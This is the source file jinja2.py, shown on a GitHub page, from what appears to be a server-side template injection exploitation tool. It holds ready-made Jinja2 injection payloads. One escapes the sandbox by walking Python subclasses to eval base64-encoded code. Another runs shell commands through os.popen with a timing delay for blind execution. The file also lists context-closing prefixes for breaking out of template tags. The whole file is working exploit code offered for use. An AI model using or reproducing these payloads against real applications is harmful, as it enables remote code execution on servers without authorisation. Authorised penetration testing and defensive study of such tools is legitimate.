-
Notifications
You must be signed in to change notification settings - Fork 668
/
jinja2.py
65 lines (55 loc) · 2.48 KB
/
jinja2.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
from utils.strings import quote
from plugins.languages import python
from utils.loggers import log
from utils import rand
import base64
import re
class Jinja2(python.Python):
def init(self):
self.update_actions({
'render' : {
'render': '{{%(code)s}}',
'header': '{{%(header)s}}',
'trailer': '{{%(trailer)s}}',
'test_render': '(%(n1)s,%(n2)s*%(n3)s)' % {
'n1' : rand.randints[0],
'n2' : rand.randints[1],
'n3' : rand.randints[2]
},
'test_render_expected': '%(res)s' % {
'res' : (rand.randints[0],rand.randints[1]*rand.randints[2])
}
},
'evaluate' : {
'call': 'render',
'evaluate': """''}}{%% set d = "eval(__import__('base64').urlsafe_b64decode('%(code_b64)s'))" %%}{%% for c in [].__class__.__base__.__subclasses__() %%} {%% if c.__name__ == 'catch_warnings' %%}
{%% for b in c.__init__.__globals__.values() %%} {%% if b.__class__ == {}.__class__ %%}
{%% if 'eval' in b.keys() %%}
{{ b['eval'](d) }}
{%% endif %%} {%% endif %%} {%% endfor %%}
{%% endif %%} {%% endfor %%}{{''"""
},
'execute_blind' : {
'call': 'inject',
'execute_blind': """{%% set d = "__import__('os').popen(__import__('base64').urlsafe_b64decode('%(code_b64)s').decode() + ' && sleep %(delay)i').read()" %%}{%% for c in [].__class__.__base__.__subclasses__() %%} {%% if c.__name__ == 'catch_warnings' %%}
{%% for b in c.__init__.__globals__.values() %%} {%% if b.__class__ == {}.__class__ %%}
{%% if 'eval' in b.keys() %%}
{{ b['eval'](d) }}
{%% endif %%} {%% endif %%} {%% endfor %%}
{%% endif %%} {%% endfor %%}"""
},
})
self.set_contexts([
# Text context, no closures
{ 'level': 0 },
# This covers {{%s}}
{ 'level': 1, 'prefix': '%(closure)s}}', 'suffix' : '', 'closures' : python.ctx_closures },
# This covers {% %s %}
{ 'level': 1, 'prefix': '%(closure)s%%}', 'suffix' : '', 'closures' : python.ctx_closures },
# If and for blocks
# # if %s:\n# endif
# # for a in %s:\n# endfor
{ 'level': 5, 'prefix': '%(closure)s\n', 'suffix' : '\n', 'closures' : python.ctx_closures },
# Comment blocks
{ 'level': 5, 'prefix' : '#}', 'suffix' : '{#' },
])